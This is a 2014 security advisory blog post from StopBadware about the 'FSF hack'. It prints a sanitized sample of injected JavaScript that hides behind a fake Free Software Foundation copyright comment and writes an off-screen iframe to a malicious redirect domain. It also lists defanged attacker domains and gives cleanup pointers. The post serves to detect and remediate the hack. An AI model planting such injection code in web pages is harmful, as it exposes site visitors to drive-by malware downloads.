'Free Software Foundation' hack

Posted on October 31, 2014 - 11:30 by ccondon

Happy Halloween, everyone! This is a PSA from the StopBadware website testing team. Our testers have recently been seeing dozens of sites hacked with a malicious iframe that loads content from from very bad places. We're referring to this as the FSF hack. 

Here is an example of the (sanitized) bad code:

/* Copyright (C) 2007 Free Software Foundation, Inc. hxxp://fsf. org/ */ function JeckPostal() { var q = navigator.userAgent; var b = (q.indexOf("Chrome") > -1 || q.indexOf("Android") > -1 || q.indexOf("Macintosh") > -1 || q.indexOf("Linux") > -1 || q.indexOf("IEMobile") > -1 || q.indexOf("FreeBSD") > -1 || q.indexOf("iPhone") > -1 || q.indexOf("iPad") > -1); if (!b) { document.write('<ifram'+'e src="hxxp://faskarao. arawat. com/welcometo15. html" style="position:absolute;left: -700px;top: -700px;" height="132" width="132"></ifr'+'ame>'); } } JeckPostal(); /*

What does it do? This creates an off-screen iframe that loads content from a site which is usually a redirect to an exploit. The site from which the content is being loaded often has randomly generated hex strings in front of the domain. For example:

hxxp://c22c38348. bigbozz. org
hxxp://309fd22fa. aerofitstudio. net
hxxp://ed757fc56. azov-sportschool2. ru

These sites commonly redirect to maliciously registered pages which attempt to download something onto the user's PC.

Where is it found? This is typically injected at the beginning of JavaScript files loaded into your HTML. It will usually be before any other type of copyright information, and is nearly always preceded by the "2007 Free Software Foundation" comment. 

RedLeg, one of our community forum mods, has a fantastic, very detailed writeup of this hack. If your site is hacked, take a look at RedLeg's info, our tutorials, and these resources to help you clean up!

Thanks to our superstar testing intern Blake for the tip on this one!